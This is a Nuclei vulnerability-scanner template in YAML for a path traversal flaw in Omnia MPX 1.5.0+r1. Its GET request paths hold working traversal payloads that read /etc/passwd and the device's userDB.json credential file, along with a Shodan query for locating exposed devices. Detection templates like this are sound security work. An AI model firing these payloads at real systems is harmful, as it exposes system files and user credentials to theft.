nuclei-templates/vulnerabilities/other/omnia-mpx-lfi.yaml

37 lines
912 B
YAML

id: omnia-mpx-lfi
info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
author: arafatansari,ritikchaddha
severity: high
description: |
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
reference:
- https://www.exploit-db.com/exploits/50996
metadata:
verified: true
shodan-query: http.html:"Omnia MPX"
tags: lfi,omnia,mpx,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: body
words:
- '"username":'
- '"password":'
- '"mustChangePwd":'
- '"roleUser":'
condition: and